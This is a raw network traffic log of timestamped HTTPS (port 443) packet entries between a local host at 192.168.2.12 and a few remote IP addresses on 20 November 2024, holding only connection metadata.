                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.438194990 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.438222885 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.439143896 CET49742443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.439160109 CET44349742104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.439600945 CET49756443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.439639091 CET44349756104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.439733028 CET49756443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.440351963 CET49756443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.440380096 CET44349756104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.442347050 CET44349740104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.442421913 CET49740443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.442423105 CET44349740104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.442435026 CET44349740104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.442486048 CET49740443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.445765018 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.445955992 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.445979118 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.450856924 CET44349740104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.454334974 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.454384089 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.454411030 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.459084988 CET44349740104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.459132910 CET49740443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.459145069 CET44349740104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.459165096 CET44349740104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.459213018 CET49740443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.459963083 CET49740443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.459970951 CET44349740104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.460340977 CET49757443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.460374117 CET44349757104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.460465908 CET49757443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.461102009 CET49757443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.461117029 CET44349757104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.496386051 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.496413946 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.542586088 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.614023924 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.614115953 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.614152908 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.614193916 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.614212990 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.614229918 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.614239931 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.614362955 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.614362955 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.622386932 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.630918026 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.631282091 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.631330013 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.631342888 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.636238098 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.636312008 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.636311054 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.636323929 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.636499882 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.639672041 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.639769077 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.639784098 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.642489910 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.652935982 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.653029919 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.653048992 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.659348965 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.659403086 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.659432888 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.667000055 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.667057991 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.667083025 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.674433947 CET49743443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.674460888 CET44349743104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.674751043 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.675184011 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.675205946 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.686155081 CET4434974834.120.195.249192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.686388016 CET4434974834.120.195.249192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.686450958 CET49748443192.168.2.1234.120.195.249
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.687335014 CET49748443192.168.2.1234.120.195.249
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.687335014 CET49748443192.168.2.1234.120.195.249
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.687351942 CET4434974834.120.195.249192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.687407017 CET49748443192.168.2.1234.120.195.249
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.688882113 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.688925982 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.688961029 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.688991070 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.689152956 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.689830065 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.697952032 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.705665112 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.705746889 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.705760002 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.713371992 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.713444948 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.713454008 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.733551979 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.760445118 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.776063919 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.776077986 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.822009087 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.822021961 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.823043108 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.823118925 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.823132992 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.830607891 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.830920935 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.831098080 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.831111908 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.833159924 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.833386898 CET49749443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.833415031 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.833694935 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.833739996 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.833787918 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.833801985 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.833969116 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.834465027 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.834532976 CET49749443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.834884882 CET49749443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.834952116 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.835129023 CET49749443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.835138083 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.838928938 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.838989019 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.839005947 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.842295885 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.848515034 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.848562002 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.848612070 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.848632097 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.848690987 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.854477882 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.854799032 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.854844093 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.854945898 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.854964018 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.855150938 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.862624884 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.866421938 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.866475105 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.866496086 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.866566896 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.870511055 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.870579958 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.870681047 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.870687962 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.870925903 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.872419119 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.872432947 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.872483969 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.877616882 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.878247023 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.878309965 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.883152008 CET49749443192.168.2.12104.16.79.73
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.884671926 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.884968996 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.884977102 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.890322924 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.890387058 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.891814947 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.891874075 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.891880035 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.896142006 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.896204948 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.898866892 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.899012089 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.899018049 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.905961990 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.906197071 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.906204939 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.908091068 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.908164978 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.919941902 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.920012951 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.931729078 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.931793928 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.937777042 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.937856913 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.945960999 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.945976019 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.949585915 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.949667931 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.955487013 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.955557108 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:34.991616964 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.021374941 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.024662971 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.024732113 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.024750948 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.029983997 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.030152082 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.030158043 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.036474943 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.036550045 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.039940119 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.040013075 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.040018082 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.040079117 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.044996023 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.045080900 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.049123049 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.049139023 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.049350023 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.049357891 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.049731016 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.049734116 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.049783945 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.057214975 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.057244062 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.057280064 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.057327986 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.057445049 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.065221071 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.065234900 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.065243006 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.065331936 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.065449953 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.069797993 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.069812059 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.070272923 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.073478937 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.073546886 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.077433109 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.077501059 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.078722954 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.078821898 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.085191965 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.085258961 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.087702036 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.087764025 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.088929892 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.089006901 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.092438936 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.092511892 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.096621037 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.096684933 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.096712112 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.096805096 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.097130060 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.097143888 CET44349747104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.097177029 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.097229958 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.097254992 CET49747443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.104075909 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.104159117 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.111637115 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.111694098 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.115458965 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.115516901 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.123094082 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.123163939 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.126861095 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.126920938 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.126938105 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.126955032 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.127002001 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.127162933 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.127181053 CET44349746104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.127190113 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.127228975 CET49746443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.293806076 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.293858051 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.293900967 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.293935061 CET44349749104.16.79.73192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:35.293966055 CET44349749104.16.79.73192.168.2.12
